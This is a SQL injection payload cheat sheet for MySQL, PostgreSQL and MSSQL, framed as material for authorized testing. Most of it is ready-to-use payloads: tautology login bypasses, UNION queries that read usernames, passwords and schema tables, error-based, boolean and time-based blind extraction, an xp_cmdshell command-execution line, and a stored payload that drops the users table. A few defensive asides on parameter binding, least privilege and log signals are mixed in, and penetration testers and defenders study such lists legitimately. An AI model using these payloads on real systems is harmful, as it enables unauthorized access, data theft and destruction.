Database exploitation techniques for authorized security testing
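Classic SQL injection authentication bypass techniques: tautology payloads against a login query built by string concatenation. Binding the username and password as query parameters removes the injection point.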
MySQL / PostgreSQL / MSSQL
admin' OR '1'='1
admin' OR 1=1--
admin' OR '1'='1'--
' OR 1=1--
') OR ('1'='1
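Union-based injection: data exfiltration via UNION SELECT statements appended to the original query. Reads of information_schema from the application's database account are rarely expected at request time, which makes them a useful signal in query logs.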
MySQL / PostgreSQL
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3,4,5--
' UNION SELECT username,password FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
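Error-based injection: data is extracted through database error messages returned to the client. Returning a generic error page and logging the detail server-side closes this channel, but not the underlying injection.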
MySQL
' AND extractvalue(1,concat(0x7e,version()))--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)y)--
Boolean-based blind injection: data is extracted by observing whether the response differs between a true and a false condition
' AND 1=1--
' AND 1=2--
' AND (SELECT LENGTH(database()))>5--
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
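Time-based blind injection: delay-based data exfiltration, where the response time reveals whether a condition is true. Sleep or delay calls in application queries are a strong signal in database logs.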
MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF((SELECT LENGTH(database()))>5,SLEEP(5),0)--
PostgreSQL exploitation payloads (pg_sleep is PostgreSQL-specific; the other lines are not specific to PostgreSQL)
PostgreSQL
' OR '1'='1'--
'; SELECT pg_sleep(5)--
' UNION SELECT NULL,version(),NULL--
' UNION SELECT table_name,NULL FROM information_schema.tables--
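Microsoft SQL Server exploitation techniques. xp_cmdshell is disabled by default in current SQL Server versions and restricted to highly privileged logins, so the last payload succeeds only where the application's database login is over-privileged; running the application under a least-privilege login limits the impact.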
MSSQL
' OR 1=1--
'; WAITFOR DELAY '00:00:05'--
' UNION SELECT NULL,@@version,NULL--
'; EXEC xp_cmdshell 'whoami'--
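Second-order (stored) injection: payloads that are stored first and executed later, when the application reuses the stored value in another query. Queries that read stored data need parameter binding too, not only those that take request input.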
admin' OR '1'='1
test','test'); DROP TABLE users--